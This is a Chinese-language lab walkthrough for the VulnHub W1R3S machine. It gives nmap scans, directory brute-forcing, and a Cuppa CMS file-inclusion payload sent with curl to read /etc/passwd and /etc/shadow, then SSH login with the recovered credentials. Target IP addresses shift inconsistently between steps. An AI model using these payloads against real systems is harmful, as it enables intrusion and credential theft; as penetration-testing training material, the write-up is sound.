w1r3s下载地址:https://www.vulnhub.com/entry/w1r3s-101,220/
下载之后导入虚拟机,选择NAT模式自动分配ip
信息收集
查看靶机ip(两种方式都可)
arp-scan -l
nmap -sn 192.168.22.0/24
靶机IP:192.168.22.128
扫描端口
nmap --min-rate 1000 -p- 192.168.80.129
发现靶机开放端口:21,22,80,3306
使用tcp协议详细扫描端口服务
在使用udp扫一次
nmap -sU -p21,22,80,3306 192.168.47.154
使用nmap自带的web漏洞脚本进行扫描
nmap --script=vuln -p21,22,80,3306 192.168.80.129
web渗透
打开web界面,出现apache
dirsearch -u 192.168.22.128 扫描目录(三种都可) dirb http://192.168.22.128 gobuster dir -u 192.168.22.128 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
爆出两个可疑目录/administrator
和/wordpress
访问/wordpress,是wordpress框架界面
访问administrator,是一个Cuppa框架
用searchsploit命令查询Cuppa cms是否存在漏洞: searchsploit cuppa cms
发现存在一处漏洞, 漏洞详情保存在25971.txt中, 将其导出来: searchsploit cuppa cms -m 25971.txt
searchsploit cuppa cms -m 25971.txt
查看漏洞详情得知, 该cms可通过文件包含漏洞读取任意文件, 我们选取其中一个payload: http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd来试试
浏览器访问:http://192.168.47.154/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd, 没有回显, 此处用的是Get请求, 后面尝试下POST请求
还可以使用curl的方式
curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.22.128/administrator/alerts/alertConfigField.php
读取shadow文件
curl -X POST -d urlConfig=../../../../../../../../../etc/shadow http://192.168.22.128/administrator/alerts/alertConfigField.php
获得passwd和shadow文件内容,root,www-data,w1r3s引起我们注意
curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.22.128/administrator/alerts/alertConfigField.php
w1r3s/computer
ssh远程登陆得到shell
提权
获得了账号w1r3s密码,直接提权成功,获得root权限